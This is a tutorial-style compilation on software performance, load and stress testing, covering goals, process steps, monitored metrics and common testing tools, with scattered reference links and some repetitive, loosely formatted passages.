Performance testing is the testing, which is performed, to ascertain how the components of a system are performing, given a particular situation. Resource usage, scalability and reliability of the product are also validated under this testing. This testing is the subset of performance engineering, which is focused on addressing performance issues in the design and architecture of software product.

Performance Testing Goal:

The primary goal of performance testing includes establishing the benchmark behaviour of the system. There are a number of industry-defined benchmarks, which should be met during performance testing.

Performance testing does not aim to find defects in the application, it address a little more critical task of testing the benchmark and standard set for the application. Accuracy and close monitoring of the performance and results of the test is the primary characteristic of performance testing.

Example:

For instance, you can test the application network performance on Connection Speed vs. Latency chart. Latency is the time difference between the data to reach from source to destination. Thus, a 70kb page would take not more than 15 seconds to load for a worst connection of 28.8kbps modem (latency=1000 milliseconds), while the page of same size would appear within 5 seconds, for the average connection of 256kbps DSL (latency=100 milliseconds). 1.5mbps T1 connection (latency=50 milliseconds) would have the performance benchmark set within 1 second to achieve this target.

For example, the time difference between the generation of request and acknowledgement of response should be in the range of x ms (milliseconds) and y ms, where x and y are standard digits. A successful performance testing should project most of the performance issues, which could be related to database, network, software, hardware etc…

Why performance testing

Organizations depend on software applications. They are the engine that drives their business. Applications enable customers, partners and employees to perform many diverse and business-critical transactions. So these systems must perform as expected and be accessible when needed.

In software engineering, performance testing is in general testing performed to determine how a system performs in terms of responsiveness and stability under a particular workload. It can also serve to investigate, measure, validate or verify other quality attributes of the system, such as scalability, reliability and resource usage.

Performance testing is a subset of performance engineering, an emerging computer science practice which strives to build performance into the implementation, design and architecture of a system.

Performance testing is done to provide stakeholders with information about their application regarding speed, stability and scalability. More importantly, performance testing uncovers what needs to be improved before the product goes to market. Without performance testing, software is likely to suffer from issues such as: running slow while several users use it simultaneously, inconsistencies across different operating systems and poor usability. Performance testing will determine whether or not their software meets speed, scalability and stability requirements under expected workloads. Applications sent to market with poor performance metrics due to nonexistent or poor performance testing are likely to gain a bad reputation and fail to meet expected sales goals. Also, mission critical applications like space launch programs or life saving medical equipments should be performance tested to ensure that they run for a long period of time without deviations.

What is performance testing?

Software performance testing is a means of quality assurance (QA). It involves testing software applications to ensure they will perform well under their expected workload.

Features and Functionality supported by a software system is not the only concern. A software application's performance like its response time, do matter. The goal of performance testing is not to find bugs but to eliminate performance bottlenecks

The focus of Performance testing is checking a software program's

• Speed - Determines whether the application responds quickly • Scalability - Determines maximum user load the software application can handle. • Stability - Determines if the application is stable under varying loads

http://en.wikipedia.org/wiki/Software_engineering


http://en.wikipedia.org/wiki/System

http://en.wikipedia.org/wiki/Quality_%28business%29

http://en.wikipedia.org/wiki/Attribute

http://en.wikipedia.org/wiki/Scalability

http://en.wiktionary.org/wiki/reliability

http://en.wikipedia.org/wiki/Performance_engineering

http://en.wikipedia.org/wiki/Computer_science

http://en.wikipedia.org/wiki/Computer_science

Common Performance Problems

Most performance problems revolve around speed, response time, load time and poor scalability. Speed is often one of the most important attributes of an application. A slow running application will lose potential users. Performance testing is done to make sure an app runs fast enough to keep a user's attention and interest. Take a look at the following list of common performance problems and notice how speed is a common factor in many of them:

• Long Load time - Load time is normally the initial time it takes an application to start. This should generally be kept to a minimum. While some applications are impossible to make load in under a minute, Load time should be kept under a few seconds if possible.

• Poor response time - Response time is the time it takes from when a user inputs data into the application until the application outputs a response to that input. Generally this should be very quick. Again if a user has to wait too long, they lose interest.

• Poor scalability - A software product suffers from poor scalability when it cannot handle the expected number of users or when it does not accommodate a wide enough range of users. Load testing should be done to be certain the application can handle the anticipated number of users.

• Bottlenecking - Bottlenecks are obstructions in system which degrade overall system performance. Bottlenecking is when either coding errors or hardware issues cause a decrease of throughput under certain loads. Bottlenecking is often caused by one faulty section of code. The key to fixing a bottlenecking issue is to find the section of code that is causing the slow down and try to fix it there. Bottle necking is generally fixed by either fixing poor running processes or adding additional Hardware. Some common performance bottlenecks are

o CPU utilization o Memory utilization o Network utilization o Operating System limitations o Disk usage

Performance Testing Process

The methodology adopted for performance testing can vary widely but the objective for performance tests remain the same. It can help demonstrate that your software system meets certain pre-defined performance criteria. Or it can help compare performance of two software systems. It can also help identify parts of your software system which degrade its performance.

Below is a generic performance testing process

1. Identify your testing environment - Know your physical test environment, production environment and what testing tools are available. Understand details of the hardware, software and network configurations used during testing before you begin the testing process. It will help testers create more efficient tests. It will also help identify possible challenges that testers may encounter during the performance testing procedures.

2. Identify the performance acceptance criteria - This includes goals and constraints for throughput, response times and resource allocation. It is also necessary to identify project success criteria outside of these goals and constraints. Testers should be empowered to set performance criteria and goals because often the project specifications will not include a wide enough variety of performance benchmarks. Sometimes there may be none at all. When possible finding a similar application to compare to is a good way to set performance goals.

3. Plan & design performance tests - Determine how usage is likely to vary amongst end users and identify key scenarios to test for all possible use cases. It is necessary to simulate a variety of end users, plan performance test data and outline what metrics will be gathered.

4. Configuring the test environment - Prepare the testing environment before execution. Also, arrange tools and other resources.

5. Implement test design - Create the performance tests according to your test design.

6. Run the tests - Execute and monitor the tests. 7. Analyze, tune and retest - Consolidate, analyze and share test results. Then

fine tune and test again to see if there is an improvement or decrease in performance. Since improvements generally grow smaller with each retest, stop when bottlenecking is caused by the CPU. Then you may have the consider option of increasing CPU power.

Performance Parameters Monitored

The basic parameters monitored during performance testing include:

• Processor Usage - amount of time processor spends executing non-idle threads.

• Memory use - amount of physical memory available to processes on a computer.

• Disk time - amount of time disk is busy executing a read or write request. • Bandwidth - shows the bits per second used by a network interface.

• Private bytes - number of bytes a process has allocated that can't be shared amongst other processes. These are used to measure memory leaks and usage.

• Committed memory - amount of virtual memory used. • Memory pages/second - number of pages written to or read from the disk in

order to resolve hard page faults. Hard page faults are when code not from the current working set is called up from elsewhere and retrieved from a disk.

• Page faults/second - the overall rate in which fault pages are processed by the processor. This again occurs when a process requires code from outside its working set.

• CPU interrupts per second - is the avg. number of hardware interrupts a processor is receiving and processing each second.

• Disk queue length - is the avg. no. of read and write requests queued for the selected disk during a sample interval.

• Network output queue length - length of the output packet queue in packets. Anything more than two means a delay and bottlenecking needs to be stopped.

• Network bytes total per second - rate which bytes are sent and received on the interface including framing characters.

• Response time - time from when a user enters a request until the first character of the response is received.

• Throughput - rate a computer or network receives requests per second. • Amount of connection pooling - the number of user requests that are met by

pooled connections. The more requests met by connections in the pool, the better the performance will be.

• Maximum active sessions - the maximum number of sessions that can be active at once.

• Hit ratios - This has to do with the number of SQL statements that are handled by cached data instead of expensive I/O operations. This is a good place to start for solving bottlenecking issues.

• Hits per second - the no. of hits on a web server during each second of a load test.

• Rollback segment - the amount of data that can rollback at any point in time. • Database locks - locking of tables and databases needs to be monitored and

carefully tuned. • Top waits - are monitored to determine what wait times can be cut down when

dealing with the how fast data is retrieved from memory • Thread counts - An applications health can be measured by the no. of threads

that are running and currently active. • Garbage collection - has to do with returning unused memory back to the

system. Garbage collection needs to be monitored for efficiency.

Performance Test Tools

There are a wide variety of performance testing tools available in market. The tool you choose for testing will depend on many factors such as types of protocol supported , license cost , hardware requirements , platform support etc. Below is a list of popularly used testing tools.

http://www.guru99.com/sql.html

http://www.guru99.com/apache.html

• HP Loadrunner - is the most popular performance testing tools on the market today. This tool is capable of simulating hundreds of thousands of users, putting applications under real life loads to determine their behavior under expected loads. Loadrunner features a virtual user generator which simulates the actions of live human users.

• HTTP Load - a throughput testing tool aimed at testing web servers by running several http or https fetches simultaneously to determine how a server handles the workload.

• Proxy Sniffer - one of the leading tools used for load testing of web and application servers. It is a cloud based tool that's capable of simulating thousands of users.

Performance testing is necessary before marketing any software product. It ensures customer satisfaction & protects investor's investment against product failure. Costs of performance testing are usually more than made up for with improved customer satisfaction, loyalty and retention.

Benefits

• Major usability problems are identified that may not be revealed by less formal testing, including problems related to the specific skills and expectations of the users.

• Measures can be obtained for the users' effectiveness, efficiency and satisfaction.

Now we will see the phases of Performance Testing Life Cycle (PTLC).

1. Non-Functional Requirements Elicitation and Analysis 2. Performance Test Strategy 3. Performance Test Design 4. Performance Test Execution 5. Performance Test Result Analysis 6. Benchmarks and Recommendations

http://www.guru99.com/loadrunner-tutorials.html

http://www.guru99.com/loadrunner-tutorials.html

http://www.acme.com/software/http_load/

http://www.proxy-sniffer.com/

Non-Functional Requirements Elicitation and Analysis

Understanding non-functional requirement is the inception and most critical phase in PTLC.

Entry Criteria

• Application Under Test (AUT) Architecture • Non-Functional Requirement Questionnaire

Tasks

• Understanding AUT architecture • Identification of critical scenarios and understanding • Understanding Interface details • Growth pattern

Exit Criteria

• Client signed-off NFR document

2. Performance Test Strategy

This phase defined how to approach Performance Testing for the identified critical scenarios. Following are to be addressed during this phase.

1. What kind of performance testing? 2. Performance tool selection 3. Hardware and software environment set up

Entry Criteria

http://qainsights.com/types-of-performance-testing/

• Signed-off NFR document

Activities

• Prepare the Test Strategy and Review • Data set up • Defining in-scope and out-scope • SLA • Workload Model • Prepare Risks and Mitigation and Review

Exit Criteria

• Baselined Performance Test Strategy doc

3. Performance Test Design

This phase involves with the script generation using identified testing tool in a dedicated environment. All the script enhancements should be done and unit tested.

Entry Criteria

• Baselined Test Strategy • Test Environment • Test Data

Activities

• Test Scripting • Data Parameterization • Correlation • Designing the action and transactions • Unit Testing

Exit Criteria

• Unit tested performance scripts

4. Performance Test Result Analysis

This phase involves dedicated to the test engineers who design scenarios based on identified workload and load the system with concurrent virtual users (VUsers).

Entry Criteria

• Baselined Test scripts

http://qainsights.com/how-to-design-workload-model-for-load-testing/

Activities

• Designing the scenarios • Loading the test script • Test script execution • Monitoring the execution • Collecting the logs

Exit Criteria

• Test script execution log files

5. Performance Test Result Analysis

The collected log files are analyzed and reviewed by the experienced test engineers. Tuning recommendation will be given if any conflicts identified.

Entry Criteria

• Collected log files

Activities

• Create graphs and charts • Correlating various graphs and charts • Prepare detailed test report • Test report analysis and review • Tuning recommendation

Exit Criteria

• Performance Analysis Report

6. Benchmark and Recommendations

This is the last phase in PTLC which involves benchmarking and providing recommendation to the client.

Entry Criteria

• Performance Analysis Report

Activities

• Comparing result with earlier execution results • Comparing with the benchmark standards

• Validate with the NFR • Prepare Test Report presentation

Exit Criteria

• Performance report reviewed and baselined

Setting performance goals

Performance testing can serve different purposes:

• It can demonstrate that the system meets performance criteria. • It can compare two systems to find which performs better. • It can measure which parts of the system or workload cause the system to

perform badly.

Many performance tests are undertaken without setting sufficiently realistic, goal-oriented performance goals. The first question from a business perspective should always be, "why are we performance-testing?". These considerations are part of the business case of the testing. Performance goals will differ depending on the system's technology and purpose, but should always include some of the following:

Performance testing web applications

According to the Microsoft Developer Network the Performance Testing Methodology consists of the following activities:

1. Identify the Test Environment. Identify the physical test environment and the production environment as well as the tools and resources available to the test team. The physical environment includes hardware, software, and network configurations. Having a thorough understanding of the entire test environment at the outset enables more efficient test design and planning and helps you identify testing challenges early in the project. In some situations, this process must be revisited periodically throughout the project’s life cycle.

2. Identify Performance Acceptance Criteria. Identify the response time, throughput, and resource-use goals and constraints. In general, response time is a user concern, throughput is a business concern, and resource use is a system concern. Additionally, identify project success criteria that may not be captured by those goals and constraints; for example, using performance tests to evaluate which combination of configuration settings will result in the most desirable performance characteristics.

3. Plan and Design Tests. Identify key scenarios, determine variability among representative users and how to simulate that variability, define test data, and

http://en.wikipedia.org/wiki/Business_case

http://msdn2.microsoft.com/en-us/library/bb924376.aspx

http://en.wikipedia.org/w/index.php?title=Test_environment&action=edit&redlink=1

http://en.wikipedia.org/wiki/Test_design

http://en.wikipedia.org/wiki/Systems_development_life-cycle

http://en.wikipedia.org/wiki/Scenario

http://en.wikipedia.org/wiki/Simulate

establish metrics to be collected. Consolidate this information into one or more models of system usage to be implemented, executed, and analyzed.

4. Configure the Test Environment. Prepare the test environment, tools, and resources necessary to execute each strategy, as features and components become available for test. Ensure that the test environment is instrumented for resource monitoring as necessary.

5. Implement the Test Design. Develop the performance tests in accordance with the test design.

6. Execute the Test. Run and monitor your tests. Validate the tests, test data, and results collection. Execute validated tests for analysis while monitoring the test and the test environment.

7. Analyze Results, Tune, and Retest. Analyze, Consolidate and share results data. Make a tuning change and retest. Compare the results of both tests. Each improvement made will return smaller improvement than the previous improvement. When do you stop? When you reach a CPU bottleneck, the choices then are either improve the code or add more CPU.

http://en.wikipedia.org/w/index.php?title=Results_collection&action=edit&redlink=1

load testing

What is Load Testing ?

Load testing is performance testing technique using which the response of the system is measured under various load conditions. The load testing is performed for normal and peak load conditions.

Load Testing Approach:

• Evaluate performance acceptance criteria • Identify critical scenarios • Design workload Model • Identify the target load levels • Design the tests • Execute Tests • Analyze the Results

Objectives of Load Testing:

• Response time • Throughput • Resource utilization • Maximum user load • Business-related metrics

Load Testing

• Load testing is a type of non-functional testing. • A load test is type of software testing which is conducted to understand the

behavior of the application under a specific expected load. • Load testing is performed to determine a system’s behavior under both normal

and at peak conditions. • It helps to identify the maximum operating capacity of an application as well as

any bottlenecks and determine which element is causing degradation. E.g. If the number of users are increased then how much CPU, memory will be consumed, what is the network and bandwidth response time.

• Load testing can be done under controlled lab conditions to compare the capabilities of different systems or to accurately measure the capabilities of a single system.

http://istqbexamcertification.com/what-is-non-functional-testing-testing-of-software-product-characteristics/


• Load testing involves simulating real-life user load for the target application. It helps you determine how your application behaves when multiple users hits it simultaneously.

• Load testing differs from stress testing, which evaluates the extent to which a system keeps working when subjected to extreme workloads or when some of its hardware or software has been compromised.

• The primary goal of load testing is to define the maximum amount of work a system can handle without significant performance degradation.

• Examples of load testing include: o Downloading a series of large files from the internet. o Running multiple applications on a computer or server simultaneously. o Assigning many jobs to a printer in a queue. o Subjecting a server to a large amount of traffic. o Writing and reading data to and from a hard disk continuously.

Load testing is meant to test the system by constantly and steadily increasing the load on the system till the time it reaches the threshold limit. It is the simplest form of testing which employs the use of automation tools such as LoadRunner or any other good tools, which are available. Load testing is also famous by the names like volume testing and endurance testing.

The sole purpose of load testing is to assign the system the largest job it could possible handle to test the endurance and monitoring the results. An interesting fact is that sometimes the system is fed with empty task to determine the behaviour of system in zero-load situation.

Load Testing Goal:

The goals of load testing are to expose the defects in application related to buffer overflow, memory leaks and mismanagement of memory. Another target of load testing is to determine the upper limit of all the components of application like database, hardware and network etc… so that it could manage the anticipated load in future. The issues that would eventually come out as the result of load testing may include load balancing problems, bandwidth issues, capacity of the existing system etc…

Example:

For example, to check the email functionality of an application, it could be flooded with 1000 users at a time. Now, 1000 users can fire the email transactions (read, send, delete, forward, reply) in many different ways. If we take one transaction per user per hour, then it would be 1000 transactions per hour. By simulating 10 transactions/user, we could load test the email server by occupying it with 10000 transactions/hour.

http://istqbexamcertification.com/what-is-stress-testing-in-software/

Load testing is the process of putting demand on a system or device and measuring its response. Load testing is performed to determine a system’s behavior under both normal and anticipated peak load conditions. It helps to identify the maximum operating capacity of an application as well as any bottlenecks and determine which element is causing degradation. When the load placed on the system is raised beyond normal usage patterns, in order to test the system's response at unusually high or peak loads, it is known as stress testing. The load is usually so great that error conditions are the expected result, although no clear boundary exists when an activity ceases to be a load test and becomes a stress test.

Load testing is the process of putting demand on a system or device and measuring its response. Load testing is performed to determine a system’s behavior under both normal and anticipated peak load conditions.

Approach for Load Testing

The following steps are involved in load-testing a Web application:

1. Step 1 - Identify performance acceptance criteria 2. Step 2 - Identify key scenarios 3. Step 3 - Create a workload model 4. Step 4 - Identify the target load levels 5. Step 5 - Identify metrics 6. Step 6 - Design specific tests 7. Step 7 - Run tests 8. Step 8 - Analyze the results

These steps are graphically represented below. The sections that follow discuss each step in detail.


Figure 17.1 Load Testing Steps

Step 1 - Identify Performance Acceptance Criteria

Identifying performance acceptance criteria is most valuable when initiated early in the application’s development life cycle. It is frequently valuable to record the acceptance criteria for your application and store them in a place and format that is available to the entire team for review and comment. Criteria are typically determined by balancing your business, industry, technology, competitive, and user requirements.

Test objectives frequently include the following:

• Response time. For example, the product catalog must be displayed in less than 3 seconds.

• Throughput. For example, the system must support 100 transactions per second.

• Resource utilization. A frequently overlooked aspect is the amount of resources your application is consuming, in terms of processor, memory, disk input output (I/O), and network I/O.

• Maximum user load. This test objective determines how many users can run on a specific hardware configuration.

• Business related metrics. This objective is mapped to business volume at normal and peak values; for example, the number of orders or Help desk calls handled at a given time.

Step 2 - Identify Key Scenarios

Scenarios are anticipated user paths that generally incorporate multiple application activities. Key scenarios are those for which you have specific performance goals, those considered to be high-risk, those that are most commonly used, or those with a significant performance impact. The basic steps for identifying key scenarios are.

1. Identify all the scenarios for a Web application. For example, even the most basic e-commerce application must support the following user scenarios:

o Browse catalog o Search for a product o Place an order

1. Identify the activities involved in each of the scenarios. For example, a “Place an Order” scenario will include the following activities:

o Log on to the application. o Browse the product catalog. o Search for a specific product. o Add items to the shopping cart. o Validate credit card details and place an order.

1. Identify the scenarios that are most commonly executed or most resource-intensive; these will be the key scenarios used for load testing. For example, in an e-commerce application, browsing a catalog may be the most commonly executed scenario, whereas placing an order may be the most resource-intensive scenario because it accesses the database.

o The most commonly executed scenarios for an existing Web application can be determined by examining the log files.

o The most commonly executed scenarios for a new Web application can be obtained from market research, historical data, market trends, and so on.

o Resource-intensive scenarios can be identified by using design documents or the actual code implementation. The primary resources are:

Processor Memory

Disk I/O Network I/O

Once they have been identified, you will use these key scenarios to create workload profiles and to design load tests.

Step 3 - Create a Workload Model

When defining workload distribution, consider the following key points for determining the characteristics for user scenarios:

• A user scenario is defined as a navigational path, including intermediate steps or activities, taken by the user to complete a task. This can also be thought of as a user session.

• A user will typically pause between pages during a session. This is known as user delay or think time.

• A session will have an average duration when viewed across multiple users. It is important to account for this when defining the load levels that will translate into concurrent usage, overlapping users, or user sessions per unit of time.

• Not all scenarios can be performed by a new user, a returning user, or either; know who you expect your primary users to be and test accordingly.

Step 4 - Identify Target Load Levels

Identify the load levels to be applied to the workload distribution(s) identified during the previous step. The purpose of identifying target load levels is to ensure that your tests can be used to predict or compare a variety of production load conditions. The following are common inputs used for determining target load levels:

• Business volume (both current and projected) as it relates to your performance objectives

• Key scenarios • Distribution of work • Session characteristics (navigational path, duration, percentage of new users)

By combining the items above, you can determine the remaining details necessary to implement the workload model under a particular target load.

Step 5 - Identify Metrics

There is a virtually unlimited number of metrics that can be collected during a performance test execution. However, collecting too many metrics can make analysis unwieldy as well as negatively impact the application’s actual performance. For these reasons, it is important to identify the metrics that are most relevant to your performance objectives and those that you anticipate will help you to identify bottlenecks. Only well-

selected metrics that are analyzed correctly and contextually provide information of value.

The following are a few suggestions for identifying the metrics that will provide the most valuable information to your project:

• Define questions related to your application performance that can be easily tested. For example, what is the checkout response time when placing an order? How many orders are placed in a minute? These questions have definite answers.

• With the answers to these questions, determine quality goals for comparison against external expectations. For example, checkout response time should be 30 seconds, and a maximum of 10 orders should be placed in a minute. The answers are based on market research, historical data, market trends, and so on.

• Identify the metrics. Using your list of performance-related questions and answers, identify the metrics that provide information related to those questions and answers.

• Identify supporting metrics. Using the same approach, you can identify lower-level metrics that focus on measuring the performance and identifying the bottlenecks in the system. When identifying low-level metrics, most teams find it valuable to determine a baseline for those metrics under single-user and/or normal load conditions. This helps you determine the acceptable load levels for your application. Baseline values help you analyze your application performance at varying load levels and serve as a starting point for trend analysis across builds or releases.

• Reevaluate the metrics to be collected regularly. Goals, priorities, risks, and current issues are bound to change over the course of a project. With each of these changes, different metrics may provide more value than the ones that have previously been identified.

Additionally, to evaluate the performance of your application in more detail and to identify potential bottlenecks, it is frequently useful to monitor metrics in the following categories:

• Network-specific metrics. This set of metrics provides information about the overall health and efficiency of your network, including routers, switches, and gateways.

• System-related metrics. This set of metrics helps you identify the resource utilization on your server. The resources being utilized are processor, memory, disk I/O, and network I/O.

• Platform-specific metrics. Platform-specific metrics are related to software that is used to host your application, such as the Microsoft .NET Framework common language runtime (CLR) and ASP.NET-related metrics.

• Application-specific metrics. These include custom performance counters inserted in your application code to monitor application health and identify

performance issues. You might use custom counters to determine the number of concurrent threads waiting to acquire a particular lock, or the number of requests queued to make an outbound call to a Web service.

• Service-level metrics. These metrics can help to measure overall application throughput and latency, or they might be tied to specific business scenarios.

• Business metrics. These metrics are indicators of business-related information, such as the number of orders placed in a given timeframe.

Step 6 - Design Specific Tests

Using your scenarios, key metrics, and workload analysis, you can now design specific tests to be conducted. Each test will generally have a different purpose, collect different data, include different scenarios, and have different target load levels. The key is to design tests that will help the team collect the information it needs in order to understand, evaluate, or tune the application.

Points to consider when designing tests include:

• Do not change your test design because the design is difficult to implement in your tool.

• If you cannot implement your test as designed, ensure that you record the details pertaining to the test that you do implement.

• Ensure that the model contains all of the supplementary data needed to create the actual test.

• Consider including invalid data in your performance tests. For example, include some users who mistype their password on the first attempt but get it correct on a second try.

• First-time users usually spend significantly more time on each page or activity than experienced users.

• The best possible test data is test data collected from a production database or log file.

• Think about nonhuman system users and batch processes as well as end users. For example, there might be a batch process that runs to update the status of orders while users are performing activities on the site. In this situation, you would need to account for those processes because they might be consuming resources.

• Do not get overly caught up in striving for perfection, and do not fall into the trap of oversimplification. In general, it is a good idea to start executing tests when you have a reasonable test designed and then enhance the design incrementally while collecting results.

Step 7 - Run Tests

Poor load simulations can render all of the work in the previous activities useless. To understand the data collected from a test execution, the load simulation must reflect the

test design. When the simulation does not reflect the test design, the results are prone to misinterpretation. Consider the following steps when preparing to simulate load:

1. Configure the test environment in such a way that it mirrors your production environment as closely as possible, noting and accounting for all differences between the two.

2. Ensure that performance counters relevant for identified metrics and resource utilization are being measured and are not interfering with the accuracy of the simulation.

3. Use appropriate load-generation tools to create a load with the characteristics specified in your test design.

4. Using the load-generation tool(s), execute tests by first building up to the target load specified in your test design, in order to validate the correctness of the simulation. Some things to consider during test execution include:

o Begin load testing with a small number of users distributed against your user profile, and then incrementally increase the load. It is important to allow time for the system to stabilize between increases in load while evaluating the correctness of the simulation.

o Consider continuing to increase the load and record the behavior until you reach the threshold for the resources identified in your performance objectives, even if that load is beyond the target load specified in the test design. Information about when the system crosses identified thresholds is just as important as the value of the metrics at the target load of the test.

o Similarly, it is frequently valuable to continue to increase the number of users until you run up against the service-level limits beyond which you would be violating your SLAs for throughput, response time, and resource utilization.

Note: Make sure that the client computers (agents) you use to generate load are not overly stressed. Resource utilization such as processor and memory must remain well below the utilization threshold values to ensure accurate test results.

Step 8 - Analyze the Results

You can analyze the test results to find performance bottlenecks between each test run or after all testing has been completed. Analyzing the results correctly requires training and experience with graphing correlated response time and system data.

The following are the steps for analyzing the data:

1. Analyze the captured data and compare the results against the metric’s accepted level to determine whether the performance of the application being tested shows a trend toward or away from the performance objectives.

2. Analyze the measured metrics to diagnose potential bottlenecks. Based on the analysis, if required, capture additional metrics in subsequent test cycles. For

example, suppose that during the first iteration of load tests, the process shows a marked increase in memory consumption, indicating a possible memory leak. In the subsequent iterations, additional memory counters related to generations can be captured to study the memory allocation pattern for the application.

Load testing helps to identify the maximum operating capacity of the application and any bottlenecks that might be degrading performance.

stress testing

What is Stress Testing?

Stress testing a Non-Functional testing technique that is performed as part of performance testing. During stress testing, the system is monitored after subjecting the system to overload to ensure that the system can sustain the stress.

The recovery of the system from such phase (after stress) is very critical as it is highly likely to happen in production environment.

Reasons for conducting Stress Testing:

• It allows the test team to monitor system performance during failures. • To verify if the system has saved the data before crashing or NOT. • To verify if the system prints meaning error messages while crashing or did it

print some random exceptions. • To verify if unexpected failures do not cause security issues.

Stress Testing - Scenarios:

• Monitor the system behavior when maximum number of users logged in at the same time.

• All users performing the critical operations at the same time. • All users Accessing the same file at the same time. • Hardware issues such as database server down or some of the servers in a

server park crashed.

Stress testing is also extremely valuable for the following reasons:

• To check whether the system works under abnormal conditions. • Displaying appropriate error message when the system is under stress. • System failure under extreme conditions could result in enormous revenue loss • It is better to be prepared for extreme conditions by executing Stress Testing.

Goals of stress testing:

The goal of stress testing is to analyze the behavior of the system after failure. For stress testing to be successful, system should display appropriate error message while it is under extreme conditions.

To conduct Stress Testing, sometimes, massive data sets may be used which may get lost during Stress Testing. Testers should not lose this security related data while doing stress testing.

The main purpose of stress testing is to make sure that the system recovers after failure which is called as recoverability.

• The software being tested is "mission critical", that is, failure of the software (such as a crash) would have disastrous consequences.

• The amount of time and resources dedicated to testing is usually not sufficient, with traditional testing methods, to test all of the situations in which the software will be used when it is released.

• Even with sufficient time and resources for writing tests, it may not be possible to determine beforehand all of the different ways in which the software will be used. This is particularly true for operating systems and middleware, which will eventually be used by software that doesn't even exist at the time of the testing.

• Customers may use the software on computers that have significantly fewer computational resources (such as memory or disk space) than the computers used for testing.

• Input data integrity cannot be guaranteed. Input data are software wide: it can be data files, streams and memory buffers, as well as arguments and options given to a command line executable or user inputs triggering actions in a GUI application. Fuzzing and monkey test methods can be used to find problems due to data corruption or incoherence.

• Concurrency is particularly difficult to test with traditional testing methods. Stress testing may be necessary to find race conditions and deadlocks.

• Software such as web servers that will be accessible over the Internet may be subject to denial of service attacks.

• Under normal conditions, certain types of bugs, such as memory leaks, can be fairly benign and difficult to detect over the short periods of time in which testing is performed. However, these bugs can still be potentially serious. In a sense, stress testing for a relatively short period of time can be seen as simulating normal operation for a longer period of time.

Stress Testing

• It is a type of non-functional testing. • It involves testing beyond normal operational capacity, often to a breaking point,

in order to observe the results. • It is a form of software testing that is used to determine the stability of a given

system. • It put greater emphasis on robustness, availability, and error handling under a

heavy load, rather than on what would be considered correct behavior under normal circumstances.

http://www.guru99.com/ethical-hacking-tutorials.html

http://en.wikipedia.org/wiki/Crash_%28computer_science%29

http://en.wikipedia.org/wiki/Operating_system

http://en.wikipedia.org/wiki/Middleware

http://en.wikipedia.org/wiki/Random_access_memory

http://en.wikipedia.org/wiki/Disk_storage

http://en.wikipedia.org/wiki/Fuzzing

http://en.wikipedia.org/wiki/Monkey_test

http://en.wikipedia.org/wiki/Concurrency_%28computer_science%29

http://en.wikipedia.org/wiki/Race_condition

http://en.wikipedia.org/wiki/Deadlock

http://en.wikipedia.org/wiki/Web_server

http://en.wikipedia.org/wiki/Internet

http://en.wikipedia.org/wiki/Denial_of_service

http://en.wikipedia.org/wiki/Software_bug

http://en.wikipedia.org/wiki/Memory_leak

http://istqbexamcertification.com/what-is-non-functional-testing-testing-of-software-product-characteristics/


• The goals of such tests may be to ensure the software does not crash in conditions of insufficient computational resources (such as memory or disk space).

Stress testing is a software testing activity that determines the robustness of software by testing beyond the limits of normal operation. Stress testing is particularly important for "mission critical" software, but is used for all types of software. Stress tests commonly put a greater emphasis on robustness, availability, and error handling under a heavy load, than on what would be considered correct behavior under normal circumstances.

Example of Stress testing is: A banking application can take a maximum user load of 20000 concurrent users. Increase the load to 21000 and do some transaction like deposit or withdraw. As soon as you did the transaction, banking application server database will sync with ATM database server. Now check with the user load of 21000 does this sync happened successfully. Now repeat the same test with 22000 thousand concurrent users and so on.

Under stress testing, various activities to overload the existing resources with excess jobs are carried out in an attempt to break the system down. Negative testing, which includes removal of the components from the system is also done as a part of stress testing. Also known as fatigue testing, this testing should capture the stability of the application by testing it beyond its bandwidth capacity.

The purpose behind stress testing is to ascertain the failure of system and to monitor how the system recovers back gracefully. The challenge here is to set up a controlled environment before launching the test so that you could precisely capture the behaviour of system repeatedly, under the most unpredictable scenarios.

Stress Testing Goal:

The goal of the stress testing is to analyse post-crash reports to define the behaviour of application after failure. The biggest issue is to ensure that the system does not compromise with the security of sensitive data after the failure. In a successful stress testing, the system will come back to normality along with all its components, after even the most terrible break down.

Types of Stress Testing:

Following are the types of stress testing and are explained as follows:



http://en.wikipedia.org/wiki/Robustness_of_software

http://en.wikipedia.org/wiki/Mission_critical

http://en.wikipedia.org/wiki/Availability

http://en.wikipedia.org/wiki/Error_handling

Distributed Stress Testing:

In distributed client-server systems, testing is done across all clients from the server. The role of stress server is to distribute a set of stress tests to all stress clients and track on the status of the client. After the client contacts the server, server adds the name of the client and starts sending data for testing.

Meanwhile, client machines send signal or heart beat that it is connected with the server. If the server does not receive any signals from the client machine, it needs to be investigated further for debugging. From figure, server can connect with the 2 clients (Client1 and Client2), but it cannot send or receive signal from Client 3 & 4.

Night run is the best option to run these stress testing scenarios. Large server farms, need more efficient method for determining which computers have had stress failures that need to be investigated .

Application Stress Testing:

This testing concentrate on finding defects related to data locking and blocking, network issues and performance bottlenecks in an application.

Transactional Stress Testing:

It does stress testing on one or more transactions between two or more applications. It is used for fine-tuning & optimizing the system.

Systemic Stress Testing:

This is integrated stress testing which can be tested across multiple systems running on the same server. It is used to find defects where one application data blocks another application.

Exploratory Stress Testing:

This is one of the types of stress testing which is used to test the system with unusual parameters or conditions that are unlikely to occur in a real scenario. It is used to find defects around unexpected scenarios like

1. Large number of users logged at the same time 2. If a virus scanner started in all machines simultaneously 3. If Database gone offline when it being accessed from a web site, 4. When a large volume of data is inserted to the database simultaneously

Tools recommended for Stress Testing:

Stress Tester

This tool provides extensive analysis of the web application performance, provides results in graphical format, and it is extremely easy to use. No high level scripting is required and gives good return on investment.

Neo load

This is a popular tool available in the market to test the web and mobile applications. This tool can simulate thousands of users in order to evaluate the application performance under load and analyze the response times. It also supports Cloud integrated - performance, load and stress testing. It is easy to use, Cost effective, and provides good scalability.

http://www.guru99.com/mobile-testing.html

App Perfect

AppPerfect is a tool used for integrated load, stress and performance testing such as response time, hit count ratio, resources utilization, scalability and reliability. It is extremely easy to use with minimal programming knowledge and is cost effective. It gives, user-friendly report with defined output like CSV, XLS, HTML and PDF.

Metrics for stress testing

Metrics help in evaluating a System's performance and generally studied at the end of Stress Test. Commonly used metrics are -

Measuring Scalability & Performance

• Pages per Second :Measures how many pages have been requested / Second • Throughput :Basic Metric - Response data size/Second • Rounds :Number of times test scenarios has been planned Versus Number of

times client has executed

Application Response

• Hit time:Average time to retrieve an image or a page • Time to the first byte:Time taken to return the first byte of data or information • Page Time :Time taken to retrieve all the information in a page

Failures

• Failed Connections :Number of failed connections refused by the client(Weak Signal)

• Failed Rounds :Number of rounds it gets failed • Failed Hits :Number of failed attempts done by the system(Broken links or

unseen images)

